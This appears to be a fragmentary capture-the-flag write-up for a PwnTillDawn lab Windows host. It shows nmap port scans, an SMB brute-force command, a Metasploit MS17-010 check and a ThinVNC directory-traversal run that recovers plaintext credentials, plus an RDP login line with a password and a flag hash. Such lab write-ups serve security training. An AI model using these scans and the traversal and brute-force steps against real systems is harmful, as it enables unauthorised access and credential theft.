As always i start with a nmap scan
┌─[root@parrot-virtual]─[/home/user/ptd] └──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining) Nmap scan report for 10.150.150.69 Host is up (0.032s latency). Not shown: 65521 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5040/tcp open unknown 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown 50417/tcp open unknown 60000/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds ┌─[root@parrot-virtual]─[/home/user/ptd] └──╼ #
$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 10.150.150.69:445 – An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
ubuntu@ubuntu:~$ nmap –script smb-brute -p445 10.150.150.69 –script-args userdb=users.txt,passdb=passwords.txt
Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.
cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.
git clone https://github.com/vulnersCom/nmap-vulners.git
Cloning into ‘nmap-vulners’…
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.
http://10.150.150.69:60000/ thinvnc
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69 rhosts => 10.150.150.69 msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000 rport => 60000 msf6 auxiliary(scanner/http/thinvnc_traversal) > run [+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt [+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/http/thinvnc_traversal) >
flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962
However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.